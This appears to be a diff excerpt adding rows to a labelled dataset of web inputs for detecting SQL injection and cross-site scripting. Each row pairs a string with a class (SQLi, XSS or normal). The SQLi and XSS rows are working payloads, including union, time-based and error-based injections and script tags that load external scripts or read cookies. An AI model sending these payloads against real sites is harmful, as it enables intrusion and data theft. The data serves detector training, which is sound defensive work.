select * from users where id = 1 + ( 1 ) or 1 = 1 -- 1,2,SQLi,17891
|
165 |
+
"-2790' ) as xhct where 5756 = 5756 union all select 5756,5756#",2,SQLi,16973
|
166 |
+
"1%"" ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13702
|
167 |
+
"<source oncontextmenu=""alert(1)"">test</source>",1,XSS,6496
|
168 |
+
-2036' ) or ( 8459 = 8459 ) *4906 and ( 'hjeu' = 'hjeu,2,SQLi,18017
|
169 |
+
"1' and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and 'lywy' like 'lywy",2,SQLi,11001
|
170 |
+
"<frameset draggable=""true"" ondragenter=""alert(1)"">test</frameset>",1,XSS,2832
|
171 |
+
"<blink ondblclick=""alert(1)"">test</blink>",1,XSS,7711
|
172 |
+
"<div draggable=""true"" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby>",1,XSS,1099
|
173 |
+
"<a href=""javas\x03cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2410
|
174 |
+
1' ) where 2090 = 2090,2,SQLi,21432
|
175 |
+
or 'something' like 'some%',2,SQLi,20862
|
176 |
+
<x oncut=alert(1)>cut this!,1,XSS,9656
|
177 |
+
"1 ) where 2044 = 2044 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,17254
|
178 |
+
"<rt onmouseenter=""alert(1)"">test</rt>",1,XSS,8661
|
179 |
+
"{""id"":null,""firstName"":""Lay Sien"",""lastName"":""Ong"",""address"":"" Dhoby Ghaut Mrt Station, 11 Orchard Road"",""city"":""58"",""telephone"":""1356410966""}",3,normal,26975
|
180 |
+
"<div id=""98""><div id=d><div style=""font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'"">X</div></div>",1,XSS,1305
|
181 |
+
<figure id=x tabindex=1 onactivate=alert(1)></figure>,1,XSS,4923
|
182 |
+
1'|| ( select 'agng' from dual where 3337 = 3337 rlike sleep ( 5 ) ) ||',2,SQLi,15981
|
183 |
+
"1' ) and elt ( 1407 = 6365,6365 ) and ( 'zckl' = 'zckl",2,SQLi,17993
|
184 |
+
"Outside of that promotion, the Select tier is usually $15.99.",3,normal,25800
|
185 |
+
"A range of intelligence will be used to select the LAs, including evidence from the subnational population projections.",3,normal,26437
|
186 |
+
"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""%"" = """,2,SQLi,14989
|
187 |
+
1 ) as gfhf where 5804 = 5804 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,15355
|
188 |
+
"</svg>//[""'`-->]]>]</div>",1,XSS,9707
|
189 |
+
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>,1,XSS,1871
|
190 |
+
"1 union all select null,null,null,null,null,null,null--",2,SQLi,17831
|
191 |
+
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #,1,XSS,845
|
192 |
+
"select count ( * ) from generate_series ( 1,5000000 ) and 'dfwj' = 'dfwj",2,SQLi,15961
|
193 |
+
"<script src=""http://code.jquery.com/jquery-1.4.4.js""></script>",1,XSS,3248
|
194 |
+
"-1368 ) ) union all select 1310,1310,1310,1310,1310#",2,SQLi,18224
|
195 |
+
"select * from users where id = 1 + ( \+ ) union select null,@@VERSION -- 1",2,SQLi,15700
|
196 |
+
"1"" ) as ztkr where 1532 = 1532",2,SQLi,20522
|
197 |
+
<cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus>,1,XSS,2753
|
198 |
+
"<section onmouseup=""alert(1)"">test</section>",1,XSS,6968
|
199 |
+
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((1337"" LIKE ""1337",2,SQLi,16249
|
200 |
+
<script x> alert(1) </script 1=2,1,XSS,9406
|
201 |
+
"<param onbeforepaste=""alert(1)"" contenteditable>test</param>",1,XSS,3524
|
202 |
+
"<style>@keyframes slidein {}</style><template style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></template>",1,XSS,317
|
203 |
+
"<footer onmouseleave=""alert(1)"">test</footer>",1,XSS,6708
|
204 |
+
"<IMG SRC=x onkeydown=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3440
|
205 |
+
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,18151
|
206 |
+
or 3=3,2,SQLi,22532
|
207 |
+
"<body draggable=""true"" ondragenter=""alert(1)"">test</body>",1,XSS,4046
|
208 |
+
<svg><element onload=alert(1)></element>,1,XSS,8026
|
209 |
+
"{""id"":null,""firstName"":""Linda"",""lastName"":""Chong"",""address"":""25 Minters Chapel Rd #9"",""city"":""575"",""telephone"":""2417450621""}",3,normal,27143
|
210 |
+
"<SCRIPT/XSS SRC=""http://xss.rocks/xss.js""></SCRIPT>",1,XSS,5290
|
211 |
+
<video><source onerror=alert(1) src=1></video>,1,XSS,6396
|
212 |
+
"1'+ ( select zpns where 6922 = 6922 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,10905
|
213 |
+
"make_set ( 2672 = 2672,5440 )",2,SQLi,20715
|
214 |
+
1' ) ) as dckd where 1794 = 1794,2,SQLi,20263
|
215 |
+
<button seekSegmentTime=javascript:alert(1)>,1,XSS,7051
|
216 |
+
"1"" ) ) as dooi where 1806 = 1806 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12052
|
217 |
+
"<style>:target {color:red;}</style><shadow id=x style=""transition:color 1s"" ontransitionend=alert(1)></shadow>",1,XSS,1031
|
218 |
+
"<set attributeName=""xlink:href"" begin=""accessKey(c)"" to=""//example.com/?c"" />",1,XSS,2154
|
219 |
+
"<label onmouseout=""alert(1)"">test</label>",1,XSS,7642
|
220 |
+
"1"" where 7022 = 7022",2,SQLi,21806
|
221 |
+
"-6236' ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11701
|
222 |
+
"<style>@keyframes slidein {}</style><em style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></em>",1,XSS,453
|
223 |
+
<th id=x tabindex=1 onbeforeactivate=alert(1)></th>,1,XSS,5359
|
224 |
+
Let's decide where to go for a relaxing day.,3,normal,23938
|
225 |
+
"<ul draggable=""true"" ondragleave=""alert(1)"">test</ul>",1,XSS,4934
|
226 |
+
"<style onLoad style onLoad=""javascript:javascript:alert(1)""></style onLoad>",1,XSS,2209
|
227 |
+
"1"" ) ) as ycvh where 4523 = 4523 and sleep ( 5 ) #",2,SQLi,18501
|
228 |
+
<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus>,1,XSS,3584
|
229 |
+
"-9352"" ) ) ) or 3038 = 3038",2,SQLi,20879
|
230 |
+
"-7812' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'ttvo' = 'ttvo",2,SQLi,10346
|
231 |
+
I'm considering where to have a peaceful retreat.,3,normal,23898
|
232 |
+
Where's the spa?,3,normal,23617
|
233 |
+
"<img src\x13=x onerror=""javascript:alert(1)"">",1,XSS,6537
|
234 |
+
"<style>@keyframes x{}</style><ol style=""animation-name:x"" onanimationend=""alert(1)""></ol>",1,XSS,1785
|
235 |
+
"<BR SIZE=""&{javascript:alert(1)}"">",1,XSS,9164
|
236 |
+
"1'+ ( select 'gjaq' where 5449 = 5449 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) ) +'",2,SQLi,11490
|
237 |
+
"-5945' ) ) ) union all select 4266,4266,4266,4266,4266--",2,SQLi,17637
|
238 |
+
Order pizza.,3,normal,23023
|
239 |
+
-4557 or 6872 = 6872-- kkte,2,SQLi,20875
|
240 |
+
"<figure onmouseout=""alert(1)"">test</figure>",1,XSS,7104
|
241 |
+
"-9574' ) as rxym where 4719 = 4719 union all select 4719,4719,4719,4719,4719,4719,4719--",2,SQLi,14781
|
242 |
+
"-8754"" ) ) ) union all select 7391,7391,7391,7391,7391,7391,7391--",2,SQLi,16615
|
243 |
+
-8777%' ) ) ) or ( 3934 = 2025 ) *2025 and ( ( ( '%' = ',2,SQLi,17670
|
244 |
+
<math>,1,XSS,9874
|
245 |
+
"1' ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 'toft' = 'toft",2,SQLi,11884
|
246 |
+
"To set them as your wallpaper, save the photo at full resolution then select wallpaper from your iPhone's Settings menu, tap ""choose a new wallpaper,"" then select the photo you saved.",3,normal,25259
|
247 |
+
"<BGSOUND SRC=""javascript:javascript:alert(1);"">",1,XSS,6093
|
248 |
+
"<script ondblclick=""alert(1)"">test</script>",1,XSS,7194
|
249 |
+
-4873' ) ) ) or 3038 = 3038,2,SQLi,20915
|
250 |
+
"1 ) where 8338 = 8338 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10463
|
251 |
+
Where's the zoo?,3,normal,23518
|
252 |
+
"1' in boolean mode ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) #",2,SQLi,11017
|
253 |
+
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>,1,XSS,2494
|
254 |
+
"<div draggable=""true"" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html>",1,XSS,1079
|
255 |
+
Where's the park?,3,normal,23537
|
256 |
+
<blockquote onpointerenter=alert(1)>XSS</blockquote>,1,XSS,5108
|
257 |
+
To purchase an item select the Add To Shopping Basket icon for the...,3,normal,25264
|
258 |
+
"<A HREF=""http://ha.ckers.org@google""></A>",1,XSS,7616
|
259 |
+
"From the top toolbar select ""Tools"" and then select ""Effects and Filters"" from the drop down menu.",3,normal,26160
|
260 |
+
( select chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7812 = 7812 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) from dual ),2,SQLi,10971
|
261 |
+
"1"" ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13143
|
262 |
+
Specify criteria where applicable.,3,normal,23357
|
263 |
+
"<var onmouseover=""prompt(1)"">On Mouse Over</var>?",1,XSS,5838
|
264 |
+
"select * from users where id = 1 *\ union select null,@@VERSION -- 1",2,SQLi,16363
|
265 |
+
1' ) where 3311 = 3311,2,SQLi,21502
|
266 |
+
"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'qjle' = 'qjle",2,SQLi,13912
|
267 |
+
1 ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 6406 = 6406,2,SQLi,12872
|
268 |
+
"-8491"" where 9043 = 9043 union all select 9043,9043,9043,9043,9043,9043,9043,9043,9043--",2,SQLi,14798
|
269 |
+
"<code oncut=""alert(1)"" contenteditable>test</code>",1,XSS,5578
|
270 |
+
select ( case when ( 9343 = 9513 ) then 1 else 9343* ( select 9343 from master..sysdatabases ) end ) --,2,SQLi,13990
|
271 |
+
"Iâll select an area in the GeoMapApp, I save it as a JPEG, and then I can select it and copy it and paste it in, and I can rotate and deform it a little bit.",3,normal,26067
|
272 |
+
"<big draggable=""true"" ondragstart=""alert(1)"">test</big>",1,XSS,4512
|
273 |
+
"<svg oncopy=""alert(1)"" contenteditable>test</svg>",1,XSS,5750
|
274 |
+
"1%"" ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,10378
|
275 |
+
"{""id"":null,""firstName"":""Sheryl"",""lastName"":""Lee"",""address"":""90177 N 55th Ave"",""city"":""407"",""telephone"":""5997060564""}",3,normal,27276
|
276 |
+
"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ""%"" = """,2,SQLi,13558
|
277 |
+
<style>@import'http://www.securitycompass.com/xss.css';</style>,1,XSS,2999
|
278 |
+
{},3,normal,26804
|
279 |
+
"1%"" and 4595 = 4595#",2,SQLi,21797
|
280 |
+
How do you select the works you plan to remake?,3,normal,26083
|
281 |
+
"1' in boolean mode ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) #",2,SQLi,12651
|
282 |
+
"-4473' ) union all select 7656,7656#",2,SQLi,19997
|
283 |
+
"( select 1 from generate_series ( 9352,9352,case when ( 9352 = 9352 ) then 1 else 0 end ) limit 1 )",2,SQLi,14169
|
284 |
+
"<nextid onclick=""alert(1)"">test</nextid>",1,XSS,7845
|
285 |
+
"Select the ""Mute"" option at the very top of the next page, and select how long you'd like to keep the server muted for.",3,normal,25606
|
286 |
+
"<base draggable=""true"" ondragend=""alert(1)"">test</base>",1,XSS,4541
|
287 |
+
"The Israelites were commanded to select on the tenth of Abib (Nisan) a he-lamb of the first year, without blemish, to kill it on the eve of the fourteenth and to sprinkle with its blood the lintel and sidepost of the doors of their dwellings so that the Lord should ""pass over"" them when he went forth to slay the first-born of the Egyptians.",3,normal,25426
|
288 |
+
"<tfoot onclick=""alert(1)"">test</tfoot>",1,XSS,8319
|
289 |
+
1' ) where 7903 = 7903,2,SQLi,21526
|
290 |
+
1%' and 6454 = 8348 and '%' = ',2,SQLi,20459
|
291 |
+
"<svg oncontextmenu=""alert(1)"">test</svg>",1,XSS,7939
|
292 |
+
I'm thinking of where to spend my evening.,3,normal,23719
|
293 |
+
"<bgsound onmouseout=""alert(1)"">test</bgsound>",1,XSS,6718
|
294 |
+
"1"" ) ) as zbfj where 2285 = 2285",2,SQLi,20325
|
295 |
+
document.scripts.length,1,XSS,9734
|
296 |
+
<form onpointerout=alert(1)>XSS</form>,1,XSS,8334
|
297 |
+
Select shop.,3,normal,24553
|
298 |
+
"<div draggable=""true"" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output>",1,XSS,1080
|
299 |
+
"<DIV STYLE=\""width: expression(alert('XSS'));\"">",1,XSS,3805
|
300 |
+
\u{0000000061}lert(1),1,XSS,9758
|
301 |
+
AND 7506=9091 AND (5913=5913,2,SQLi,20788
|
302 |
+
"<style></style\x3E<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,2006
|
303 |
+
"1%"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""%"" = """,2,SQLi,18383
|
304 |
+
1' where 5547 = 5547,2,SQLi,21888
|
305 |
+
"{""id"":null,""firstName"":""Ã¥ÿââ¬âæúÃÂ"",""lastName"":""Ã¥ÿââ¬âæúÃÂ"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27045
|
306 |
+
1 and 9198 = 9198--,2,SQLi,21981
|
307 |
+
The XLE is the Energy Select Sector SPDR Fund ETF.,3,normal,25359
|
308 |
+
"1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'drvk' like 'drvk",2,SQLi,10543
|
309 |
+
"<SCRIPT ="">"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,6390
|
310 |
+
Select your image.,3,normal,24896
|
311 |
+
"iif ( 8770 = 9611,1,1/0 )",2,SQLi,21102
|
312 |
+
"`""'><img src=xxx:x onerror\x09=javascript:alert(1)>",1,XSS,5333
|
313 |
+
"<style>@keyframes x{}</style><param style=""animation-name:x"" onanimationstart=""alert(1)""></param>",1,XSS,1542
|
314 |
+
"1 ) as jvuo where 6859 = 6859 union all select null,null,null,null,null,null,null#",2,SQLi,15109
|
315 |
+
"{""id"":null,""name"":""CharizardMega Charizard X""}",3,normal,27193
|
316 |
+
<wbr onpointerup=alert(1)>XSS</wbr>,1,XSS,9062
|
317 |
+
"-4929"" where 6381 = 6381 or 8571 = 8571--",2,SQLi,19435
|
318 |
+
"<isindex onmousemove=""alert(1)"">test</isindex>",1,XSS,6379
|
319 |
+
<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus>,1,XSS,2321
|
320 |
+
"<font onmouseleave=""alert(1)"">test</font>",1,XSS,7725
|
321 |
+
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337,2,SQLi,16558
|
322 |
+
insert,3,normal,23110
|
323 |
+
any,3,normal,23186
|
324 |
+
"Crate & Barrel: Up to 50% off outdoor furniture, 40% off select outdoor entertaining, 20% off select bedding, mattresses and box springs.",3,normal,26265
|
325 |
+
"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3--",2,SQLi,14452
|
326 |
+
"1 ) ) and elt ( 4249 = 4249,7259 ) and ( ( 5683 = 5683",2,SQLi,18025
|
327 |
+
"<optgroup draggable=""true"" ondrag=""alert(1)"">test</optgroup>",1,XSS,3498
|
328 |
+
"1 ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 4003 = 4003",2,SQLi,10889
|
329 |
+
"{""id"":null,""firstName"":""Goh"",""lastName"":""Katherine"",""address"":""32820 Corkwood Rd"",""city"":""573"",""telephone"":""5621469576""}",3,normal,27594
|
330 |
+
1' where 9024 = 9024 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,15304
|
331 |
+
"<FRAMESET><FRAME SRC=\""javascript:alert('XSS');\""></FRAMESET>",1,XSS,3266
|
332 |
+
-2891 where 1770 = 1770 or 9290 = 5866,2,SQLi,19691
|
333 |
+
select case when 9390 = 5752 then 1 else null end--,2,SQLi,18307
|
334 |
+
"-1447"" union all select 3013,3013,3013,3013,3013,3013,3013--",2,SQLi,17202
|
335 |
+
"-4381 or make_set ( 6118 = 3095,3095 ) # lkcr",2,SQLi,19056
|
336 |
+
"Select a categoryâin this case, ""Check-in & Redemption Issues"" is most relevantâand then select a question.",3,normal,25668
|
337 |
+
"<textarea onmouseover=""alert(1)"">test</textarea>",1,XSS,6070
|
338 |
+
Select inspire.,3,normal,24736
|
339 |
+
"Since that time select Japanese species, chosen for superior milling qualities, have been widely introduced, as the market prejudice in favour of head rice made the large percentage of broken rice a heavy handicap to the farmers.",3,normal,25549
|
340 |
+
><img src=x onerror=javascript:alert('1')>,1,XSS,7325
|
341 |
+
<div id=x tabindex=1 onbeforeactivate=alert(1)></div>,1,XSS,5044
|
342 |
+
"-4285' ) ) ) union all select 8819,8819,8819,8819,8819,8819,8819,8819#",2,SQLi,16195
|
343 |
+
Filter the spam messages from your inbox.,3,normal,22913
|
344 |
+
Head Full of Honey is in select theaters Nov. 30.,3,normal,26111
|
345 |
+
"-3719"" union all select 6609,6609,6609,6609#",2,SQLi,19112
|
346 |
+
-2351 ) ) as xdqn where 4019 = 4019 or 8571 = 8571--,2,SQLi,18177
|
347 |
+
"-7485"" ) ) as caob where 4100 = 4100 union all select 4100,4100,4100,4100,4100,4100,4100,4100--",2,SQLi,14394
|
348 |
+
"<select draggable=""true"" ondragstart=""alert(1)"">test</select>",1,XSS,3316
|
349 |
+
"<thead onmouseleave=""alert(1)"">test</thead>",1,XSS,7261
|
350 |
+
"<output onmouseover=""alert(1)"">test</output>",1,XSS,7006
|
351 |
+
"{""id"":null,""name"":""RotomMow Rotom""}",3,normal,27385
|
352 |
+
"ABC<div style=""x:\xE2\x80\x83expression(javascript:alert(1)"">DEF",1,XSS,2866
|
353 |
+
<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus>,1,XSS,2642
|
354 |
+
Where's the nail salon?,3,normal,23622
|
355 |
+
1' ) where 5378 = 5378,2,SQLi,21413
|
356 |
+
"1%' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14864
|
357 |
+
1 where 2672 = 2672 and 1819 = 4322#,2,SQLi,19978
|
358 |
+
-5211 union all select 1754--,2,SQLi,20721
|
359 |
+
"If you want to select certain contacts to download, hover your cursor over their name and tick the box that appears; otherwise, in the left sidebar, select ""Export.""",3,normal,26045
|
360 |
+
"<IMG SRC=x onmouseout=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3263
|
361 |
+
"1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'nwdk' like 'nwdk",2,SQLi,10460
|
362 |
+
<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus>,1,XSS,2678
|
363 |
+
"<source onpaste=""alert(1)"" contenteditable>test</source>",1,XSS,4311
|
364 |
+
<b <script>alert(1)</script>0,1,XSS,9580
|
365 |
+
"Leesa offers a ""white glove"" delivery service in select locations.",3,normal,25915
|
366 |
+
To browse the repository select Browse from the navigation bar on the left of the screen.,3,normal,25286
|
367 |
+
"<col onmouseover=""alert(1)"">test</col>",1,XSS,8410
|
368 |
+
"<style>@keyframes slidein {}</style><title style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></title>",1,XSS,381
|
369 |
+
-6190' ) where 2621 = 2621 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9999
|
370 |
+
1%' ) and 2006 = 2006,2,SQLi,21681
|
371 |
+
"1 ) union all select null,null,null,null,null,null,null--",2,SQLi,17545
|
372 |
+
1 ) ) as xbii where 2262 = 2262 or sleep ( 5 ) --,2,SQLi,18607
|
373 |
+
<embed id=x tabindex=1 onactivate=alert(1)></embed>,1,XSS,5462
|
374 |
+
"-4259' ) ) as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --",2,SQLi,16530
|
375 |
+
Select your influence.,3,normal,24878
|
376 |
+
"1"" ) as nyzd where 5305 = 5305",2,SQLi,20580
|
377 |
+
"1' ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16078
|
378 |
+
<table onpointermove=alert(1)>XSS</table>,1,XSS,7789
|
379 |
+
"<figure onbeforecut=""alert(1)"" contenteditable>test</figure>",1,XSS,3461
|
380 |
+
1 where 4245 = 4245,2,SQLi,21973
|
381 |
+
-9005 union all select 4410#,2,SQLi,20833
|
382 |
+
<basefont id=x tabindex=1 onfocusin=alert(1)></basefont>,1,XSS,4353
|
383 |
+
1'+ ( select echl where 6593 = 6593 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,14485
|
384 |
+
"1 ) ) ) union all select null,null--",2,SQLi,20000
|
385 |
+
"<applet draggable=""true"" ondragend=""alert(1)"">test</applet>",1,XSS,3651
|
386 |
+
I'll select a gift for my cousin's birthday.,3,normal,23708
|
387 |
+
select ( case when ( 4996 = 1734 ) then 1 else 4996* ( select 4996 from master..sysdatabases ) end ) --,2,SQLi,13983
|
388 |
+
"<menu ondblclick=""alert(1)"">test</menu>",1,XSS,8116
|
389 |
+
"ORDER BY 1,SLEEP(5),3--",2,SQLi,21266
|
390 |
+
"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( 'ayqn' like 'ayqn",2,SQLi,12217
|
391 |
+
"1 ) ) as faxr where 7972 = 7972 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12400
|
392 |
+
"<menuitem draggable=""true"" ondragend=""alert(1)"">test</menuitem>",1,XSS,3093
|
393 |
+
"<TABLE><TD BACKGROUND=""javascript:javascript:alert(1)"">",1,XSS,4421
|
394 |
+
"<textarea draggable=""true"" ondragstart=""alert(1)"">test</textarea>",1,XSS,2804
|
395 |
+
Filter the search results for relevant information.,3,normal,22952
|
396 |
+
1' ) where 5279 = 5279 or sleep ( 5 ) #,2,SQLi,19616
|
397 |
+
"1"" ) ) as qode where 2398 = 2398 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12163
|
398 |
+
"1' ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 'qvqf' = 'qvqf",2,SQLi,12580
|
399 |
+
<form onpointerup=alert(1)>XSS</form>,1,XSS,8727
|
400 |
+
"-7337"" union all select 7294,7294,7294,7294,7294,7294,7294,7294,7294,7294--",2,SQLi,15608
|
401 |
+
"<div draggable=""true"" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>",1,XSS,1323
|
402 |
+
<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus>,1,XSS,2909
|
403 |
+
"<style draggable=""true"" ondragend=""alert(1)"">test</style>",1,XSS,4130
|
404 |
+
<li onpointerout=alert(1)>XSS</li>,1,XSS,9229
|
405 |
+
"-9111"" or 3038 = 3038",2,SQLi,21685
|
406 |
+
"1"" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""fqeu"" like ""fqeu",2,SQLi,14184
|
407 |
+
"{""id"":null,""firstName"":""Fook Weng"",""lastName"":""Ow Yong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27208
|
408 |
+
"<object classid=""clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"" onqt_error=""alert(126)"" style=""behavior:url(#x);""><param name=postdomevents /></object>//[""'`-->]]>]</div>",1,XSS,346
|
409 |
+
end and ( ( ( 'hglq' like 'hglq,2,SQLi,20413
|
410 |
+
<script onreadystatechange=alert(1)></script>,1,XSS,6607
|
411 |
+
"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))",2,SQLi,13481
|
412 |
+
<nav id=x tabindex=1 onfocusin=alert(1)></nav>,1,XSS,6494
|
413 |
+
"1' ) ) and elt ( 6847 = 5874,5874 ) and ( ( 'yspu' = 'yspu",2,SQLi,17375
|
414 |
+
"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'cogk' = 'cogk",2,SQLi,10738
|
415 |
+
<nextid id=x tabindex=1 onactivate=alert(1)></nextid>,1,XSS,4967
|
416 |
+
"<a href=""%0aalert(1)"" onclick=""protocol='javascript'"">test</a>",1,XSS,3124
|
417 |
+
"<style>@keyframes x{}</style><dl style=""animation-name:x"" onanimationend=""alert(1)""></dl>",1,XSS,1773
|
418 |
+
"<p onclick=""alert(1)"">test</p>",1,XSS,9542
|
419 |
+
"<style>:target {color: red;}</style><fieldset id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></fieldset>",1,XSS,742
|
420 |
+
"{""id"":null,""firstName"":""Juay"",""lastName"":""Yew Hai"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27564
|
421 |
